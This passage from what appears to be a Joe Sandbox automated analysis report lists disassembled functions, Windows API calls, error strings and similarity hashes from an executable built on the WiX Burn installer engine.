                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 00408BB5
                                                                                                                                                          • Failed to set registration variables., xrefs: 00408D28
                                                                                                                                                          • WixBundleCommandLineAction, xrefs: 00408CED
                                                                                                                                                          • clbcatq.dll, xrefs: 00408CEC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostWindow
                                                                                                                                                          • String ID: Failed to check global conditions$Failed to create the message window.$Failed to load BootstrapperExtensions.$Failed to open log.$Failed to query registration.$Failed to set command line action variable.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$WixBundleCommandLineAction$WixBundleLayoutDirectory$WixBundleOriginalSource$clbcatq.dll$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 3618638489-23188151
                                                                                                                                                          • Opcode ID: bc27e21bed054997a685aacdfef09e9d6963caa88466dac64bd5853b373689fb
                                                                                                                                                          • Instruction ID: 4ca616b25fd78b34896fa9f907fbd0697fb01d8b45450ce7fbeb8445ebd727a5
                                                                                                                                                          • Opcode Fuzzy Hash: bc27e21bed054997a685aacdfef09e9d6963caa88466dac64bd5853b373689fb
                                                                                                                                                          • Instruction Fuzzy Hash: 0581B571A40716BADB119B61CD45FEFB6B8AF04700F10423FF545F62C1EB78A9508BA8
                                                                                                                                                          Function 00450447 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 252COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to copy install arguments for update bundle package, xrefs: 00450712
                                                                                                                                                          • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 0045047F
                                                                                                                                                          • Failed to copy download source for pseudo bundle., xrefs: 00450597
                                                                                                                                                          • Failed to copy key for pseudo bundle payload., xrefs: 0045050B
                                                                                                                                                          • Failed to copy id for update bundle., xrefs: 0045069C
                                                                                                                                                          • Failed to copy filename for pseudo bundle., xrefs: 00450536
                                                                                                                                                          • ~~C, xrefs: 00450447
                                                                                                                                                          • WixBundleRollbackLog_%ls, xrefs: 004506EE
                                                                                                                                                          • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 004504C3
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\pseudobundle.cpp, xrefs: 0045046C, 00450477, 00450491, 004504B0, 004504BB, 004505F3, 0045061E, 00450629, 00450724
                                                                                                                                                          • WixBundleLog_%ls, xrefs: 004506DE
                                                                                                                                                          • Failed to decode hash string: %ls., xrefs: 004505E1
                                                                                                                                                          • Failed to allocate memory for update bundle payload hash., xrefs: 00450631
                                                                                                                                                          • Failed to copy cache id for update bundle., xrefs: 004506C5
                                                                                                                                                          • Failed to copy local source path for pseudo bundle., xrefs: 00450561
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$WixBundleLog_%ls$WixBundleRollbackLog_%ls$d:\a\wix\wix\src\burn\engine\pseudobundle.cpp$~~C
                                                                                                                                                          • API String ID: 1617791916-45883921
                                                                                                                                                          • Opcode ID: 9f39873dbb578f99873fe75b4d3e44a57bf282c66b5616a4717f786d1efb4d9f
                                                                                                                                                          • Instruction ID: a644be3552a4b52e5a90bb878c1ed40511a6c5afffe57aa46d8515e10df4a51a
                                                                                                                                                          • Opcode Fuzzy Hash: 9f39873dbb578f99873fe75b4d3e44a57bf282c66b5616a4717f786d1efb4d9f
                                                                                                                                                          • Instruction Fuzzy Hash: D6710C71B40315BBDB219E558C46F9B7E58AB04B15F11013BBD08FB2C1E3F8E9548B98
                                                                                                                                                          Function 00406B4C Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 195fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetTempFileNameW.KERNEL32(00000000,000000F6,00000001,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,00000001), ref: 00406BD4
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406BE2
                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,00000001), ref: 00406C7A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C87
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CreateNameTemp
                                                                                                                                                          • String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 2316751675-3180914264
                                                                                                                                                          • Opcode ID: ede8294ed054f4eaa16b559dd93b741b44d87aeeef134c6b671cb6e270799138
                                                                                                                                                          • Instruction ID: 9a6d470e8976dd33999de4de615c16fdd4d54d37620609bca355d59fe9579ad6
                                                                                                                                                          • Opcode Fuzzy Hash: ede8294ed054f4eaa16b559dd93b741b44d87aeeef134c6b671cb6e270799138
                                                                                                                                                          • Instruction Fuzzy Hash: 21513B31B4032576EB312A558C0EFAF3A68DF01B34F52427BBE19BA1D1E27C4D20969D
                                                                                                                                                          Function 0045094D Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,0043B8B7,0044CCA9,8000FFFF,000000B0,?,00000000,00000000,00000008,?,8000FFFF,?), ref: 00450956
                                                                                                                                                          • GetProcessId.KERNEL32(?,00000000,00000008,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450A7D
                                                                                                                                                            • Part of subcall function 0041B39D: lstrlenW.KERNEL32(64681479,00000000,00000000,00000004,?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000), ref: 0041B3D1
                                                                                                                                                            • Part of subcall function 0041B39D: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 0041B3DC
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450B1A
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,0043B8B7,?,004508A0,8000FFFF,?,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00450B2D
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to append embedded args., xrefs: 004509FE
                                                                                                                                                          • burn.embedded, xrefs: 004509E2
                                                                                                                                                          • Failed to create embedded process at path: %ls, xrefs: 00450A66
                                                                                                                                                          • Failed to wait for embedded process to connect to pipe., xrefs: 00450A9C
                                                                                                                                                          • Failed to wait for embedded executable: %ls, xrefs: 00450AF5
                                                                                                                                                          • Failed to process messages from embedded message., xrefs: 00450ACB
                                                                                                                                                          • Failed to create embedded pipe., xrefs: 004509C7
                                                                                                                                                          • Failed to append user args., xrefs: 00450A2F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\embedded.cpp, xrefs: 004509A7, 00450B04
                                                                                                                                                          • %ls -%ls %ls %ls %u, xrefs: 004509EA
                                                                                                                                                          • Failed to create embedded pipe name and client token., xrefs: 00450998
                                                                                                                                                          • %ls, xrefs: 00450A1B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCurrentHandle$lstrlen
                                                                                                                                                          • String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix\wix\src\burn\engine\embedded.cpp
                                                                                                                                                          • API String ID: 371141078-2178332678
                                                                                                                                                          • Opcode ID: 209e2bbf3152eb0d1b372ed1075cd12acb9cf1906df22ca69cc98f984c0f1094
                                                                                                                                                          • Instruction ID: 53bc25a49415031172dba7e4ca4f9f9b0de2ca42141443f131b599a5dc3bcff6
                                                                                                                                                          • Opcode Fuzzy Hash: 209e2bbf3152eb0d1b372ed1075cd12acb9cf1906df22ca69cc98f984c0f1094
                                                                                                                                                          • Instruction Fuzzy Hash: D651C535A80715BBDF129A94CC46FDE7E74AF04715F200127FE04B91D2D3B8A9548B9D
                                                                                                                                                          Function 0042B910 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 130windowregistryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0042B94B
                                                                                                                                                          • RegisterClassW.USER32(?), ref: 0042B95F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B96A
                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0042B9E6
                                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 0042B9FA
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0042BA08
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0042BA12
                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042BA1F
                                                                                                                                                          • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0042BA57
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0042BA66
                                                                                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 0042BA79
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$Class$CursorDeleteDialogDispatchErrorEventLastLoadObjectPostRegisterTranslateUnregister
                                                                                                                                                          • String ID: Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
                                                                                                                                                          • API String ID: 1126262391-909264728
                                                                                                                                                          • Opcode ID: e283da046b6ac20e6b6f2048ff2ef2d82d6d0ddcef83d474a2dd279031ca4e02
                                                                                                                                                          • Instruction ID: 51c4dd155626f649d15f0ff0031e0e49bd55d296fbe602a6d4f54fb9c10163c8
                                                                                                                                                          • Opcode Fuzzy Hash: e283da046b6ac20e6b6f2048ff2ef2d82d6d0ddcef83d474a2dd279031ca4e02
                                                                                                                                                          • Instruction Fuzzy Hash: DD41A871A00329ABEB119B94DC49FAF7779FB04714F904027FA04B6290D7786C51DBE9
                                                                                                                                                          Function 00412BD4 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 251registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,000004A0,00000120,00000000,?,?,?,?,?,00000000,00000000,00000000,00000120,000004A0,?,00000000), ref: 00412E8A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open registry key., xrefs: 00412CA3
                                                                                                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 00412D66
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 00412D52, 00412D5D, 00412D78, 00412E4E
                                                                                                                                                          • Failed to query registry key value., xrefs: 00412D16
                                                                                                                                                          • Failed to read registry value., xrefs: 00412DED
                                                                                                                                                          • Failed to change value type., xrefs: 00412E13
                                                                                                                                                          • Failed to format value string., xrefs: 00412C4E
                                                                                                                                                          • Failed to format key string., xrefs: 00412C1C
                                                                                                                                                          • Registry key not found. Key = '%ls', xrefs: 00412CC1
                                                                                                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00412CFF
                                                                                                                                                          • Failed to set variable., xrefs: 00412E3C
                                                                                                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 00412E62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 3535843008-3247734957
                                                                                                                                                          • Opcode ID: 12bd8c43e26c3d2d80f399d4e7a8911576fe1dff76ee46c7f9dd62b1de8dacb2
                                                                                                                                                          • Instruction ID: 6a3f590ba287f123ba5eb6c660a86e588a3463e90b215b76a7f7c5b5a3178aec
                                                                                                                                                          • Opcode Fuzzy Hash: 12bd8c43e26c3d2d80f399d4e7a8911576fe1dff76ee46c7f9dd62b1de8dacb2
                                                                                                                                                          • Instruction Fuzzy Hash: F281F771E4021ABBDB129A91CD46FEFBA39AF08704F100127F604F61D0E3B999A09799
                                                                                                                                                          Function 0044FAB4 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?), ref: 0044FB19
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0044FB85
                                                                                                                                                          • UuidCreate.RPCRT4(00000000), ref: 0044FBE0
                                                                                                                                                          • StringFromGUID2.OLE32(00000000,?,00000027,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?), ref: 0044FC0E
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00437E7E,?,00000000,?,00000000,00000000,?,?,00000000), ref: 0044FCEC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CreateEnterFromLeaveStringUuidlstrlen
                                                                                                                                                          • String ID: %ls\%ls$Engine is active, cannot change engine state.$Failed to build bundle update file path.$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to create command-line for update bundle.$Failed to set update bundle.$d:\a\wix\wix\src\burn\engine\externalengine.cpp$~~C$~~C
                                                                                                                                                          • API String ID: 1974238189-1261730144
                                                                                                                                                          • Opcode ID: 03f5b560b0e41b490184b3bdf92d975ef718fade531225520f45196dc2e5a06e
                                                                                                                                                          • Instruction ID: 76d9bde9d56a6a3542f3f286c5160536a990d8c7c614d1e0ed2ac3a64bda58fd
                                                                                                                                                          • Opcode Fuzzy Hash: 03f5b560b0e41b490184b3bdf92d975ef718fade531225520f45196dc2e5a06e
                                                                                                                                                          • Instruction Fuzzy Hash: 05618431E40319ABEF21DAA1CC45F9F77B8EB05704F14413BF905EB291E678A948CB98
                                                                                                                                                          Function 004443AC Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 175serviceCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004443E5
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004443F4
                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 0044444E
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 0044445A
                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004444A2
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004449C3,?,?,?), ref: 004444AC
                                                                                                                                                            • Part of subcall function 004445B2: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00444551,00000000,00000003), ref: 004445C9
                                                                                                                                                            • Part of subcall function 004445B2: GetLastError.KERNEL32(?,00444551,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004445D3
                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0044458E
                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00444599
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                          • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix\wix\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                          • API String ID: 2017831661-2683244120
                                                                                                                                                          • Opcode ID: 748bab543414944ad4ab47874563405ef71a4a1d197366f364fe9476595efdfb
                                                                                                                                                          • Instruction ID: 63597a68b73f4120795fd45a560b3b74a0674a4ac04394bda1ca117a8d697a03
                                                                                                                                                          • Opcode Fuzzy Hash: 748bab543414944ad4ab47874563405ef71a4a1d197366f364fe9476595efdfb
                                                                                                                                                          • Instruction Fuzzy Hash: 0951C836E4032477E7219A649C46FAF7AA4AB85B54F11413AFE04BB382D77C9C4186EC
                                                                                                                                                          Function 00406418 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 142COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00406446
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 0040648B
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 004064CB
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 004064D9
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 004064E7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00406576
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$FileModuleName
                                                                                                                                                          • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 1026760046-1889348001
                                                                                                                                                          • Opcode ID: 4ca52385180dcaad019fa9073459385e82e8a0b58531bf08f5f04a0d0a71ed28
                                                                                                                                                          • Instruction ID: 2138d87be215f1ea1cc20fa625e0f4d1cd6fdd8d41726a79d599f7009da7d355
                                                                                                                                                          • Opcode Fuzzy Hash: 4ca52385180dcaad019fa9073459385e82e8a0b58531bf08f5f04a0d0a71ed28
                                                                                                                                                          • Instruction Fuzzy Hash: B7412672A4022077EB215A949C4DF6F6AA8DB04B14F538177FD0AFB2D1D23C8C5086AD
                                                                                                                                                          Function 00474CB2 Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 249COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
